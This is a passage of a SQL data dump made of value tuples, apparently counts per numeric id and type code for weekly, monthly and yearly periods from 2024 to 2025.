(1754,1,'202529',5),
(362,1,'202529',6),
(476,1,'202529',6),
(605,1,'202529',6),
(609,1,'202529',6),
(643,1,'202529',6),
(871,1,'202529',14),
(355,1,'202529',36),
(14,1,'202529',333),
(476,1,'202530',1),
(566,1,'202530',1),
(700,1,'202530',1),
(716,1,'202530',1),
(741,1,'202530',1),
(748,1,'202530',1),
(776,1,'202530',1),
(784,1,'202530',1),
(810,1,'202530',1),
(828,1,'202530',1),
(836,1,'202530',1),
(851,1,'202530',1),
(855,1,'202530',1),
(900,1,'202530',1),
(1003,1,'202530',1),
(1010,1,'202530',1),
(1020,1,'202530',1),
(1059,1,'202530',1),
(1623,1,'202530',1),
(1754,1,'202530',1),
(484,1,'202530',2),
(542,1,'202530',2),
(563,1,'202530',2),
(609,1,'202530',2),
(656,1,'202530',2),
(859,1,'202530',2),
(1032,1,'202530',2),
(1036,1,'202530',2),
(1502,1,'202530',2),
(1571,1,'202530',2),
(1704,1,'202530',2),
(469,1,'202530',3),
(643,1,'202530',3),
(712,1,'202530',3),
(1523,1,'202530',3),
(1540,1,'202530',3),
(1594,1,'202530',3),
(1611,1,'202530',3),
(1684,1,'202530',3),
(1697,1,'202530',3),
(605,1,'202530',4),
(1558,1,'202530',4),
(362,1,'202530',5),
(871,1,'202530',5),
(355,1,'202530',18),
(14,1,'202530',103),
(506,1,'202531',1),
(566,1,'202531',1),
(643,1,'202531',1),
(656,1,'202531',1),
(680,1,'202531',1),
(700,1,'202531',1),
(703,1,'202531',1),
(716,1,'202531',1),
(748,1,'202531',1),
(771,1,'202531',1),
(784,1,'202531',1),
(828,1,'202531',1),
(840,1,'202531',1),
(859,1,'202531',1),
(900,1,'202531',1),
(1032,1,'202531',1),
(1059,1,'202531',1),
(1594,1,'202531',1),
(1623,1,'202531',1),
(459,1,'202531',2),
(496,1,'202531',2),
(708,1,'202531',2),
(712,1,'202531',2),
(741,1,'202531',2),
(810,1,'202531',2),
(1523,1,'202531',2),
(1611,1,'202531',2),
(469,1,'202531',3),
(546,1,'202531',3),
(1571,1,'202531',3),
(1704,1,'202531',3),
(476,1,'202531',4),
(650,1,'202531',4),
(1540,1,'202531',4),
(1684,1,'202531',4),
(1697,1,'202531',4),
(1754,1,'202531',4),
(362,1,'202531',8),
(355,1,'202531',9),
(14,1,'202531',70),
(484,1,'202532',1),
(716,1,'202532',1),
(542,1,'202532',2),
(680,1,'202532',2),
(700,1,'202532',2),
(708,1,'202532',2),
(771,1,'202532',2),
(780,1,'202532',2),
(784,1,'202532',2),
(836,1,'202532',2),
(840,1,'202532',2),
(1020,1,'202532',2),
(1036,1,'202532',2),
(1059,1,'202532',2),
(1684,1,'202532',2),
(362,1,'202532',3),
(459,1,'202532',3),
(703,1,'202532',3),
(748,1,'202532',3),
(776,1,'202532',3),
(831,1,'202532',3),
(851,1,'202532',3),
(855,1,'202532',3),
(1016,1,'202532',3),
(1558,1,'202532',3),
(1611,1,'202532',3),
(469,1,'202532',4),
(506,1,'202532',4),
(563,1,'202532',4),
(650,1,'202532',4),
(824,1,'202532',4),
(828,1,'202532',4),
(1010,1,'202532',4),
(1052,1,'202532',4),
(1502,1,'202532',4),
(476,1,'202532',5),
(605,1,'202532',5),
(1523,1,'202532',5),
(1540,1,'202532',5),
(1704,1,'202532',5),
(1754,1,'202532',5),
(546,1,'202532',6),
(566,1,'202532',6),
(609,1,'202532',6),
(643,1,'202532',6),
(656,1,'202532',6),
(355,1,'202532',7),
(496,1,'202532',7),
(712,1,'202532',7),
(1032,1,'202532',7),
(1571,1,'202532',7),
(1623,1,'202532',7),
(1003,1,'202532',8),
(1594,1,'202532',8),
(1697,1,'202532',8),
(741,1,'202532',9),
(810,1,'202532',9),
(859,1,'202532',9),
(871,1,'202532',9),
(900,1,'202532',9),
(1915,1,'202532',9),
(14,1,'202532',161),
(506,1,'202533',1),
(542,1,'202533',1),
(650,1,'202533',1),
(656,1,'202533',1),
(680,1,'202533',1),
(700,1,'202533',1),
(708,1,'202533',1),
(716,1,'202533',1),
(741,1,'202533',1),
(776,1,'202533',1),
(824,1,'202533',1),
(831,1,'202533',1),
(840,1,'202533',1),
(1010,1,'202533',1),
(1016,1,'202533',1),
(1052,1,'202533',1),
(1571,1,'202533',1),
(476,1,'202533',2),
(546,1,'202533',2),
(563,1,'202533',2),
(566,1,'202533',2),
(605,1,'202533',2),
(780,1,'202533',2),
(784,1,'202533',2),
(810,1,'202533',2),
(836,1,'202533',2),
(855,1,'202533',2),
(1032,1,'202533',2),
(1036,1,'202533',2),
(1704,1,'202533',2),
(496,1,'202533',3),
(859,1,'202533',3),
(900,1,'202533',3),
(1003,1,'202533',3),
(1020,1,'202533',3),
(1540,1,'202533',3),
(609,1,'202533',4),
(712,1,'202533',4),
(1523,1,'202533',4),
(1594,1,'202533',4),
(1611,1,'202533',4),
(1623,1,'202533',4),
(355,1,'202533',5),
(362,1,'202533',5),
(1502,1,'202533',5),
(1558,1,'202533',5),
(1684,1,'202533',5),
(469,1,'202533',6),
(643,1,'202533',6),
(1697,1,'202533',6),
(1754,1,'202533',6),
(871,1,'202533',9),
(1915,1,'202533',31),
(14,1,'202533',92),
(14,1,'202534',2),
(362,1,'202535',1),
(459,1,'202535',1),
(484,1,'202535',1),
(506,1,'202535',1),
(566,1,'202535',1),
(605,1,'202535',1),
(650,1,'202535',1),
(656,1,'202535',1),
(700,1,'202535',1),
(703,1,'202535',1),
(708,1,'202535',1),
(712,1,'202535',1),
(716,1,'202535',1),
(741,1,'202535',1),
(771,1,'202535',1),
(780,1,'202535',1),
(784,1,'202535',1),
(824,1,'202535',1),
(836,1,'202535',1),
(840,1,'202535',1),
(859,1,'202535',1),
(900,1,'202535',1),
(1010,1,'202535',1),
(1020,1,'202535',1),
(1036,1,'202535',1),
(1052,1,'202535',1),
(1059,1,'202535',1),
(1502,1,'202535',1),
(1540,1,'202535',1),
(1611,1,'202535',1),
(1697,1,'202535',1),
(469,1,'202535',2),
(496,1,'202535',2),
(542,1,'202535',2),
(546,1,'202535',2),
(609,1,'202535',2),
(748,1,'202535',2),
(776,1,'202535',2),
(810,1,'202535',2),
(828,1,'202535',2),
(831,1,'202535',2),
(851,1,'202535',2),
(871,1,'202535',2),
(1003,1,'202535',2),
(1016,1,'202535',2),
(1032,1,'202535',2),
(1523,1,'202535',2),
(1571,1,'202535',2),
(1594,1,'202535',2),
(1684,1,'202535',2),
(1704,1,'202535',2),
(1754,1,'202535',2),
(563,1,'202535',3),
(680,1,'202535',3),
(1623,1,'202535',3),
(355,1,'202535',5),
(1915,1,'202535',11),
(14,1,'202535',50),
(542,1,'202536',1),
(546,1,'202536',1),
(566,1,'202536',1),
(650,1,'202536',1),
(656,1,'202536',1),
(703,1,'202536',1),
(712,1,'202536',1),
(716,1,'202536',1),
(771,1,'202536',1),
(855,1,'202536',1),
(900,1,'202536',1),
(1010,1,'202536',1),
(1016,1,'202536',1),
(1059,1,'202536',1),
(1571,1,'202536',1),
(1594,1,'202536',1),
(1611,1,'202536',1),
(1623,1,'202536',1),
(1697,1,'202536',1),
(1704,1,'202536',1),
(484,1,'202536',2),
(496,1,'202536',2),
(506,1,'202536',2),
(741,1,'202536',2),
(748,1,'202536',2),
(784,1,'202536',2),
(836,1,'202536',2),
(859,1,'202536',2),
(1003,1,'202536',2),
(1020,1,'202536',2),
(1032,1,'202536',2),
(1036,1,'202536',2),
(1540,1,'202536',2),
(1754,1,'202536',2),
(362,1,'202536',3),
(469,1,'202536',3),
(476,1,'202536',3),
(459,1,'202536',4),
(605,1,'202536',4),
(609,1,'202536',4),
(643,1,'202536',4),
(1915,1,'202536',5),
(355,1,'202536',14),
(14,1,'202536',110),
(362,1,'202537',1),
(484,1,'202537',1),
(542,1,'202537',1),
(680,1,'202537',1),
(700,1,'202537',1),
(703,1,'202537',1),
(716,1,'202537',1),
(776,1,'202537',1),
(831,1,'202537',1),
(836,1,'202537',1),
(840,1,'202537',1),
(855,1,'202537',1),
(1020,1,'202537',1),
(1059,1,'202537',1),
(496,1,'202537',2),
(609,1,'202537',2),
(643,1,'202537',2),
(708,1,'202537',2),
(712,1,'202537',2),
(871,1,'202537',2),
(1003,1,'202537',2),
(1010,1,'202537',2),
(1036,1,'202537',2),
(1502,1,'202537',2),
(476,1,'202537',3),
(546,1,'202537',3),
(566,1,'202537',3),
(656,1,'202537',3),
(784,1,'202537',3),
(859,1,'202537',3),
(900,1,'202537',3),
(1540,1,'202537',3),
(1558,1,'202537',3),
(1611,1,'202537',3),
(1623,1,'202537',3),
(1684,1,'202537',3),
(1697,1,'202537',3),
(459,1,'202537',4),
(748,1,'202537',4),
(810,1,'202537',4),
(1523,1,'202537',4),
(1754,1,'202537',4),
(469,1,'202537',5),
(563,1,'202537',5),
(650,1,'202537',5),
(1594,1,'202537',5),
(1704,1,'202537',5),
(741,1,'202537',6),
(1032,1,'202537',6),
(1571,1,'202537',6),
(355,1,'202537',7),
(1915,1,'202537',11),
(14,1,'202537',212),
(1020,1,'202538',1),
(542,1,'202538',2),
(1036,1,'202538',2),
(836,1,'202538',3),
(851,1,'202538',3),
(1010,1,'202538',3),
(1540,1,'202538',3),
(1704,1,'202538',3),
(1754,1,'202538',3),
(680,1,'202538',4),
(700,1,'202538',4),
(703,1,'202538',4),
(840,1,'202538',4),
(1016,1,'202538',4),
(1502,1,'202538',4),
(1523,1,'202538',4),
(1558,1,'202538',4),
(1611,1,'202538',4),
(1684,1,'202538',4),
(1697,1,'202538',4),
(484,1,'202538',5),
(506,1,'202538',5),
(708,1,'202538',5),
(716,1,'202538',5),
(771,1,'202538',5),
(776,1,'202538',5),
(824,1,'202538',5),
(831,1,'202538',5),
(855,1,'202538',5),
(1059,1,'202538',5),
(1594,1,'202538',5),
(1915,1,'202538',5),
(712,1,'202538',6),
(741,1,'202538',6),
(780,1,'202538',6),
(828,1,'202538',6),
(900,1,'202538',6),
(1003,1,'202538',6),
(1032,1,'202538',6),
(1571,1,'202538',6),
(1623,1,'202538',6),
(476,1,'202538',7),
(496,1,'202538',7),
(546,1,'202538',7),
(566,1,'202538',7),
(643,1,'202538',7),
(650,1,'202538',7),
(748,1,'202538',7),
(1052,1,'202538',7),
(563,1,'202538',8),
(609,1,'202538',8),
(859,1,'202538',8),
(459,1,'202538',9),
(656,1,'202538',9),
(784,1,'202538',9),
(810,1,'202538',10),
(871,1,'202538',11),
(362,1,'202538',12),
(605,1,'202538',12),
(355,1,'202538',15),
(469,1,'202538',17),
(14,1,'202538',144),
(469,1,'202539',1),
(476,1,'202539',1),
(484,1,'202539',1),
(563,1,'202539',1),
(605,1,'202539',1),
(609,1,'202539',1),
(700,1,'202539',1),
(703,1,'202539',1),
(708,1,'202539',1),
(716,1,'202539',1),
(741,1,'202539',1),
(810,1,'202539',1),
(828,1,'202539',1),
(836,1,'202539',1),
(871,1,'202539',1),
(900,1,'202539',1),
(1020,1,'202539',1),
(1059,1,'202539',1),
(643,1,'202539',2),
(748,1,'202539',2),
(1502,1,'202539',2),
(1523,1,'202539',2),
(1540,1,'202539',2),
(1558,1,'202539',2),
(1684,1,'202539',2),
(1915,1,'202539',2),
(1032,1,'202539',3),
(355,1,'202539',5),
(14,1,'202539',68),
(66,2,'202408',1),
(95,2,'202408',1),
(900,2,'202408',5),
(1010,2,'202408',5),
(1016,2,'202408',5),
(1059,2,'202408',5),
(496,2,'202408',6),
(563,2,'202408',6),
(656,2,'202408',6),
(1003,2,'202408',6),
(1020,2,'202408',6),
(1032,2,'202408',6),
(484,2,'202408',7),
(566,2,'202408',7),
(609,2,'202408',7),
(680,2,'202408',7),
(748,2,'202408',7),
(810,2,'202408',7),
(824,2,'202408',7),
(1036,2,'202408',7),
(1052,2,'202408',7),
(476,2,'202408',8),
(542,2,'202408',8),
(546,2,'202408',8),
(712,2,'202408',8),
(716,2,'202408',8),
(828,2,'202408',8),
(836,2,'202408',8),
(851,2,'202408',8),
(459,2,'202408',9),
(506,2,'202408',9),
(605,2,'202408',9),
(708,2,'202408',9),
(741,2,'202408',9),
(771,2,'202408',9),
(776,2,'202408',9),
(831,2,'202408',9),
(859,2,'202408',9),
(469,2,'202408',10),
(643,2,'202408',10),
(703,2,'202408',10),
(780,2,'202408',10),
(784,2,'202408',10),
(840,2,'202408',10),
(855,2,'202408',10),
(700,2,'202408',11),
(871,2,'202408',11),
(650,2,'202408',13),
(362,2,'202408',16),
(355,2,'202408',48),
(14,2,'202408',245),
(1105,2,'202409',1),
(484,2,'202409',7),
(496,2,'202409',7),
(563,2,'202409',8),
(656,2,'202409',8),
(542,2,'202409',9),
(609,2,'202409',9),
(643,2,'202409',9),
(716,2,'202409',9),
(741,2,'202409',9),
(748,2,'202409',9),
(1016,2,'202409',9),
(459,2,'202409',10),
(476,2,'202409',10),
(771,2,'202409',10),
(810,2,'202409',10),
(836,2,'202409',10),
(851,2,'202409',10),
(855,2,'202409',10),
(362,2,'202409',11),
(566,2,'202409',11),
(700,2,'202409',11),
(708,2,'202409',11),
(712,2,'202409',11),
(828,2,'202409',11),
(831,2,'202409',11),
(1010,2,'202409',11),
(1020,2,'202409',11),
(1032,2,'202409',11),
(546,2,'202409',12),
(650,2,'202409',12),
(776,2,'202409',12),
(1059,2,'202409',12),
(680,2,'202409',13),
(784,2,'202409',13),
(871,2,'202409',13),
(469,2,'202409',14),
(859,2,'202409',14),
(900,2,'202409',14),
(1036,2,'202409',14),
(605,2,'202409',15),
(703,2,'202409',15),
(824,2,'202409',15),
(1003,2,'202409',15),
(1052,2,'202409',15),
(506,2,'202409',16),
(780,2,'202409',17),
(840,2,'202409',32),
(355,2,'202409',37),
(14,2,'202409',252),
(810,2,'202410',7),
(700,2,'202410',9),
(542,2,'202410',10),
(563,2,'202410',10),
(748,2,'202410',10),
(1032,2,'202410',10),
(656,2,'202410',11),
(741,2,'202410',11),
(836,2,'202410',11),
(496,2,'202410',12),
(716,2,'202410',12),
(859,2,'202410',12),
(680,2,'202410',13),
(712,2,'202410',13),
(776,2,'202410',13),
(831,2,'202410',13),
(900,2,'202410',13),
(1036,2,'202410',13),
(1052,2,'202410',13),
(459,2,'202410',14),
(546,2,'202410',14),
(708,2,'202410',14),
(771,2,'202410',14),
(784,2,'202410',14),
(824,2,'202410',14),
(828,2,'202410',14),
(855,2,'202410',14),
(1003,2,'202410',14),
(1010,2,'202410',14),
(1016,2,'202410',14),
(1020,2,'202410',14),
(1059,2,'202410',14),
(484,2,'202410',15),
(703,2,'202410',15),
(780,2,'202410',15),
(851,2,'202410',15),
(871,2,'202410',15),
(609,2,'202410',16),
(566,2,'202410',17),
(643,2,'202410',17),
(362,2,'202410',18),
(506,2,'202410',18),
(650,2,'202410',19),
(476,2,'202410',20),
(469,2,'202410',21),
(605,2,'202410',22),
(840,2,'202410',49),
(355,2,'202410',130),
(14,2,'202410',11763),
(836,2,'202411',2),
(1032,2,'202411',2),
(563,2,'202411',3),
(716,2,'202411',3),
(748,2,'202411',3),
(810,2,'202411',3),
(871,2,'202411',3),
(900,2,'202411',3),
(1059,2,'202411',3),
(566,2,'202411',4),
(680,2,'202411',4),
(700,2,'202411',4),
(708,2,'202411',4),
(712,2,'202411',4),
(741,2,'202411',4),
(851,2,'202411',4),
(859,2,'202411',4),
(1016,2,'202411',4),
(1020,2,'202411',4),
(1052,2,'202411',4),
(459,2,'202411',5),
(776,2,'202411',5),
(784,2,'202411',5),
(824,2,'202411',5),
(1010,2,'202411',5),
(1036,2,'202411',5),
(546,2,'202411',6),
(605,2,'202411',6),
(609,2,'202411',6),
(703,2,'202411',6),
(771,2,'202411',6),
(828,2,'202411',6),
(831,2,'202411',6),
(840,2,'202411',6),
(855,2,'202411',6),
(1003,2,'202411',6),
(362,2,'202411',7),
(476,2,'202411',7),
(484,2,'202411',7),
(542,2,'202411',7),
(496,2,'202411',8),
(643,2,'202411',8),
(780,2,'202411',8),
(656,2,'202411',9),
(469,2,'202411',11),
(650,2,'202411',11),
(506,2,'202411',13),
(355,2,'202411',17),
(14,2,'202411',167),
(716,2,'202412',5),
(784,2,'202412',5),
(542,2,'202412',6),
(546,2,'202412',6),
(828,2,'202412',6),
(1032,2,'202412',6),
(1052,2,'202412',6),
(459,2,'202412',7),
(563,2,'202412',7),
(566,2,'202412',7),
(680,2,'202412',7),
(700,2,'202412',7),
(703,2,'202412',7),
(708,2,'202412',7),
(712,2,'202412',7),
(741,2,'202412',7),
(748,2,'202412',7),
(776,2,'202412',7),
(859,2,'202412',7),
(1020,2,'202412',7),
(484,2,'202412',8),
(771,2,'202412',8),
(780,2,'202412',8),
(810,2,'202412',8),
(824,2,'202412',8),
(836,2,'202412',8),
(900,2,'202412',8),
(1010,2,'202412',8),
(650,2,'202412',9),
(656,2,'202412',9),
(851,2,'202412',9),
(855,2,'202412',9),
(871,2,'202412',9),
(1016,2,'202412',9),
(1059,2,'202412',9),
(476,2,'202412',10),
(605,2,'202412',10),
(831,2,'202412',10),
(1003,2,'202412',10),
(1036,2,'202412',10),
(840,2,'202412',11),
(362,2,'202412',12),
(496,2,'202412',12),
(609,2,'202412',12),
(643,2,'202412',12),
(469,2,'202412',13),
(506,2,'202412',23),
(355,2,'202412',57),
(14,2,'202412',345),
(771,2,'202501',7),
(840,2,'202501',7),
(851,2,'202501',7),
(476,2,'202501',8),
(484,2,'202501',8),
(855,2,'202501',8),
(1010,2,'202501',8),
(459,2,'202501',9),
(680,2,'202501',9),
(748,2,'202501',9),
(810,2,'202501',9),
(831,2,'202501',9),
(859,2,'202501',9),
(1003,2,'202501',9),
(1016,2,'202501',9),
(1036,2,'202501',9),
(1052,2,'202501',9),
(362,2,'202501',10),
(542,2,'202501',10),
(563,2,'202501',10),
(566,2,'202501',10),
(700,2,'202501',10),
(703,2,'202501',10),
(708,2,'202501',10),
(712,2,'202501',10),
(776,2,'202501',10),
(784,2,'202501',10),
(824,2,'202501',10),
(836,2,'202501',10),
(1032,2,'202501',10),
(1059,2,'202501',10),
(496,2,'202501',11),
(643,2,'202501',11),
(656,2,'202501',11),
(716,2,'202501',11),
(741,2,'202501',11),
(780,2,'202501',11),
(828,2,'202501',11),
(900,2,'202501',11),
(1020,2,'202501',11),
(609,2,'202501',14),
(546,2,'202501',15),
(605,2,'202501',17),
(650,2,'202501',17),
(469,2,'202501',20),
(506,2,'202501',23),
(871,2,'202501',24),
(355,2,'202501',81),
(14,2,'202501',427),
(712,2,'202502',10),
(840,2,'202502',10),
(851,2,'202502',10),
(459,2,'202502',11),
(563,2,'202502',11),
(566,2,'202502',11),
(703,2,'202502',11),
(708,2,'202502',11),
(771,2,'202502',11),
(780,2,'202502',11),
(784,2,'202502',11),
(824,2,'202502',11),
(836,2,'202502',11),
(855,2,'202502',11),
(900,2,'202502',11),
(1020,2,'202502',11),
(1032,2,'202502',11),
(484,2,'202502',12),
(542,2,'202502',12),
(546,2,'202502',12),
(605,2,'202502',12),
(656,2,'202502',12),
(680,2,'202502',12),
(700,2,'202502',12),
(716,2,'202502',12),
(741,2,'202502',12),
(748,2,'202502',12),
(859,2,'202502',12),
(1003,2,'202502',12),
(1036,2,'202502',12),
(1059,2,'202502',12),
(362,2,'202502',13),
(643,2,'202502',13),
(650,2,'202502',13),
(776,2,'202502',13),
(810,2,'202502',13),
(831,2,'202502',13),
(1016,2,'202502',13),
(1052,2,'202502',13),
(496,2,'202502',14),
(506,2,'202502',14),
(609,2,'202502',14),
(828,2,'202502',14),
(1010,2,'202502',14),
(476,2,'202502',15),
(871,2,'202502',18),
(469,2,'202502',22),
(355,2,'202502',100),
(14,2,'202502',445),
(476,2,'202503',4),
(1003,2,'202503',4),
(1010,2,'202503',4),
(1016,2,'202503',4),
(1052,2,'202503',4),
(784,2,'202503',5),
(831,2,'202503',5),
(840,2,'202503',5),
(851,2,'202503',5),
(855,2,'202503',5),
(1032,2,'202503',5),
(459,2,'202503',6),
(484,2,'202503',6),
(496,2,'202503',6),
(566,2,'202503',6),
(656,2,'202503',6),
(680,2,'202503',6),
(712,2,'202503',6),
(771,2,'202503',6),
(780,2,'202503',6),
(810,2,'202503',6),
(824,2,'202503',6),
(859,2,'202503',6),
(1036,2,'202503',6),
(1059,2,'202503',6),
(563,2,'202503',7),
(703,2,'202503',7),
(716,2,'202503',7),
(748,2,'202503',7),
(828,2,'202503',7),
(836,2,'202503',7),
(1020,2,'202503',7),
(469,2,'202503',8),
(506,2,'202503',8),
(542,2,'202503',8),
(546,2,'202503',8),
(700,2,'202503',8),
(708,2,'202503',8),
(741,2,'202503',10),
(776,2,'202503',10),
(871,2,'202503',10),
(900,2,'202503',10),
(605,2,'202503',11),
(362,2,'202503',12),
(650,2,'202503',13),
(609,2,'202503',15),
(643,2,'202503',16),
(355,2,'202503',43),
(14,2,'202503',477),
(703,2,'202504',9),
(840,2,'202504',9),
(1059,2,'202504',9),
(459,2,'202504',10),
(542,2,'202504',10),
(700,2,'202504',10),
(748,2,'202504',10),
(771,2,'202504',10),
(810,2,'202504',10),
(851,2,'202504',10),
(1020,2,'202504',10),
(506,2,'202504',11),
(656,2,'202504',11),
(680,2,'202504',11),
(716,2,'202504',11),
(784,2,'202504',11),
(824,2,'202504',11),
(855,2,'202504',11),
(900,2,'202504',11),
(1032,2,'202504',11),
(1052,2,'202504',11),
(476,2,'202504',12),
(484,2,'202504',12),
(496,2,'202504',12),
(546,2,'202504',12),
(563,2,'202504',12),
(566,2,'202504',12),
(712,2,'202504',12),
(780,2,'202504',12),
(828,2,'202504',12),
(831,2,'202504',12),
(836,2,'202504',12),
(871,2,'202504',12),
(1003,2,'202504',12),
(1016,2,'202504',12),
(1036,2,'202504',12),
(859,2,'202504',13),
(1010,2,'202504',13),
(362,2,'202504',15),
(708,2,'202504',16),
(643,2,'202504',17),
(605,2,'202504',18),
(469,2,'202504',19),
(650,2,'202504',20),
(741,2,'202504',22),
(776,2,'202504',22),
(609,2,'202504',30),
(355,2,'202504',90),
(14,2,'202504',760),
(506,2,'202505',3),
(831,2,'202505',3),
(716,2,'202505',4),
(824,2,'202505',4),
(1020,2,'202505',4),
(1032,2,'202505',4),
(459,2,'202505',5),
(566,2,'202505',5),
(708,2,'202505',5),
(776,2,'202505',5),
(780,2,'202505',5),
(784,2,'202505',5),
(836,2,'202505',5),
(855,2,'202505',5),
(1010,2,'202505',5),
(1016,2,'202505',5),
(1036,2,'202505',5),
(1052,2,'202505',5),
(1059,2,'202505',5),
(680,2,'202505',6),
(703,2,'202505',6),
(741,2,'202505',6),
(771,2,'202505',6),
(810,2,'202505',6),
(828,2,'202505',6),
(840,2,'202505',6),
(542,2,'202505',7),
(563,2,'202505',7),
(650,2,'202505',7),
(656,2,'202505',7),
(851,2,'202505',7),
(859,2,'202505',7),
(476,2,'202505',8),
(496,2,'202505',8),
(609,2,'202505',8),
(700,2,'202505',8),
(748,2,'202505',8),
(900,2,'202505',8),
(1003,2,'202505',8),
(712,2,'202505',9),
(484,2,'202505',10),
(546,2,'202505',12),
(605,2,'202505',13),
(871,2,'202505',13),
(469,2,'202505',15),
(362,2,'202505',20),
(643,2,'202505',35),
(355,2,'202505',45),
(14,2,'202505',570),
(771,2,'202506',3),
(851,2,'202506',5),
(542,2,'202506',6),
(703,2,'202506',6),
(708,2,'202506',6),
(836,2,'202506',6),
(840,2,'202506',6),
(855,2,'202506',6),
(1036,2,'202506',6),
(680,2,'202506',7),
(716,2,'202506',7),
(780,2,'202506',7),
(824,2,'202506',7),
(1052,2,'202506',7),
(1059,2,'202506',7),
(776,2,'202506',8),
(831,2,'202506',8),
(506,2,'202506',9),
(784,2,'202506',9),
(1016,2,'202506',9),
(1020,2,'202506',9),
(1032,2,'202506',11),
(656,2,'202506',12),
(748,2,'202506',12),
(810,2,'202506',12),
(1003,2,'202506',14),
(484,2,'202506',15),
(563,2,'202506',15),
(712,2,'202506',16),
(459,2,'202506',17),
(496,2,'202506',17),
(546,2,'202506',18),
(609,2,'202506',18),
(650,2,'202506',19),
(700,2,'202506',19),
(859,2,'202506',19),
(900,2,'202506',19),
(643,2,'202506',20),
(741,2,'202506',21),
(1010,2,'202506',21),
(566,2,'202506',22),
(605,2,'202506',22),
(828,2,'202506',22),
(469,2,'202506',23),
(362,2,'202506',25),
(355,2,'202506',33),
(476,2,'202506',38),
(871,2,'202506',50),
(14,2,'202506',275),
(1637,2,'202507',1),
(1676,2,'202507',1),
(851,2,'202507',4),
(748,2,'202507',5),
(1016,2,'202507',5),
(780,2,'202507',6),
(831,2,'202507',6),
(836,2,'202507',6),
(1003,2,'202507',6),
(1052,2,'202507',6),
(506,2,'202507',7),
(680,2,'202507',7),
(700,2,'202507',7),
(771,2,'202507',7),
(776,2,'202507',7),
(810,2,'202507',7),
(855,2,'202507',7),
(1036,2,'202507',7),
(1059,2,'202507',7),
(496,2,'202507',8),
(542,2,'202507',8),
(656,2,'202507',8),
(703,2,'202507',8),
(708,2,'202507',8),
(824,2,'202507',8),
(741,2,'202507',9),
(1010,2,'202507',9),
(716,2,'202507',10),
(1020,2,'202507',10),
(828,2,'202507',11),
(563,2,'202507',12),
(840,2,'202507',12),
(859,2,'202507',12),
(784,2,'202507',13),
(900,2,'202507',13),
(1502,2,'202507',13),
(1611,2,'202507',13),
(1623,2,'202507',13),
(1032,2,'202507',14),
(1684,2,'202507',14),
(484,2,'202507',15),
(566,2,'202507',15),
(609,2,'202507',15),
(1540,2,'202507',15),
(1754,2,'202507',15),
(712,2,'202507',16),
(1523,2,'202507',16),
(1704,2,'202507',16),
(546,2,'202507',18),
(650,2,'202507',18),
(643,2,'202507',19),
(1558,2,'202507',19),
(469,2,'202507',20),
(1594,2,'202507',20),
(1697,2,'202507',21),
(459,2,'202507',22),
(1571,2,'202507',23),
(362,2,'202507',31),
(476,2,'202507',33),
(605,2,'202507',33),
(871,2,'202507',36),
(355,2,'202507',96),
(14,2,'202507',722),
(484,2,'202508',2),
(771,2,'202508',3),
(1059,2,'202508',3),
(459,2,'202508',4),
(700,2,'202508',4),
(703,2,'202508',4),
(708,2,'202508',4),
(716,2,'202508',4),
(840,2,'202508',4),
(542,2,'202508',5),
(780,2,'202508',5),
(836,2,'202508',5),
(851,2,'202508',5),
(855,2,'202508',5),
(1036,2,'202508',5),
(506,2,'202508',6),
(680,2,'202508',6),
(748,2,'202508',6),
(776,2,'202508',6),
(784,2,'202508',6),
(824,2,'202508',6),
(828,2,'202508',6),
(831,2,'202508',6),
(1010,2,'202508',6),
(1016,2,'202508',6),
(1020,2,'202508',6),
(1052,2,'202508',6),
(605,2,'202508',8),
(656,2,'202508',8),
(1558,2,'202508',8),
(362,2,'202508',9),
(563,2,'202508',9),
(650,2,'202508',9),
(1611,2,'202508',9),
(476,2,'202508',10),
(566,2,'202508',10),
(1502,2,'202508',10),
(1571,2,'202508',10),
(1684,2,'202508',10),
(1523,2,'202508',11),
(496,2,'202508',12),
(546,2,'202508',12),
(609,2,'202508',12),
(643,2,'202508',12),
(741,2,'202508',12),
(1032,2,'202508',12),
(1540,2,'202508',12),
(1704,2,'202508',12),
(712,2,'202508',13),
(900,2,'202508',13),
(1003,2,'202508',13),
(469,2,'202508',14),
(810,2,'202508',14),
(859,2,'202508',14),
(1594,2,'202508',14),
(1623,2,'202508',14),
(1754,2,'202508',16),
(1697,2,'202508',18),
(871,2,'202508',20),
(355,2,'202508',24),
(1915,2,'202508',51),
(14,2,'202508',334),
(851,2,'202509',3),
(542,2,'202509',4),
(680,2,'202509',5),
(824,2,'202509',5),
(840,2,'202509',5),
(1016,2,'202509',5),
(1020,2,'202509',5),
(700,2,'202509',6),
(771,2,'202509',6),
(776,2,'202509',6),
(780,2,'202509',6),
(831,2,'202509',6),
(1010,2,'202509',6),
(1036,2,'202509',6),
(506,2,'202509',7),
(703,2,'202509',7),
(828,2,'202509',7),
(836,2,'202509',7),
(855,2,'202509',7),
(1052,2,'202509',7),
(708,2,'202509',8),
(716,2,'202509',8),
(1059,2,'202509',8),
(1502,2,'202509',8),
(1611,2,'202509',8),
(1697,2,'202509',8),
(484,2,'202509',9),
(712,2,'202509',9),
(1558,2,'202509',9),
(1684,2,'202509',9),
(1704,2,'202509',9),
(1754,2,'202509',9),
(1003,2,'202509',10),
(1523,2,'202509',10),
(1540,2,'202509',10),
(1623,2,'202509',10),
(496,2,'202509',11),
(546,2,'202509',11),
(566,2,'202509',11),
(900,2,'202509',11),
(1594,2,'202509',11),
(650,2,'202509',13),
(656,2,'202509',13),
(859,2,'202509',13),
(1571,2,'202509',13),
(476,2,'202509',14),
(563,2,'202509',14),
(784,2,'202509',14),
(871,2,'202509',14),
(609,2,'202509',15),
(643,2,'202509',15),
(741,2,'202509',15),
(748,2,'202509',15),
(810,2,'202509',15),
(362,2,'202509',16),
(459,2,'202509',17),
(605,2,'202509',17),
(1032,2,'202509',17),
(1915,2,'202509',23),
(469,2,'202509',26),
(355,2,'202509',41),
(14,2,'202509',534),
(66,3,'2024',1),
(95,3,'2024',1),
(1105,3,'2024',1),
(563,3,'2024',34),
(810,3,'2024',35),
(1032,3,'2024',35),
(748,3,'2024',36),
(716,3,'2024',37),
(836,3,'2024',39),
(542,3,'2024',40),
(741,3,'2024',40),
(1016,3,'2024',41),
(700,3,'2024',42),
(1020,3,'2024',42),
(656,3,'2024',43),
(712,3,'2024',43),
(900,3,'2024',43),
(1010,3,'2024',43),
(1059,3,'2024',43),
(484,3,'2024',44),
(680,3,'2024',44),
(459,3,'2024',45),
(496,3,'2024',45),
(708,3,'2024',45),
(828,3,'2024',45),
(1052,3,'2024',45),
(546,3,'2024',46),
(566,3,'2024',46),
(776,3,'2024',46),
(851,3,'2024',46),
(859,3,'2024',46),
(771,3,'2024',47),
(784,3,'2024',47),
(824,3,'2024',49),
(831,3,'2024',49),
(855,3,'2024',49),
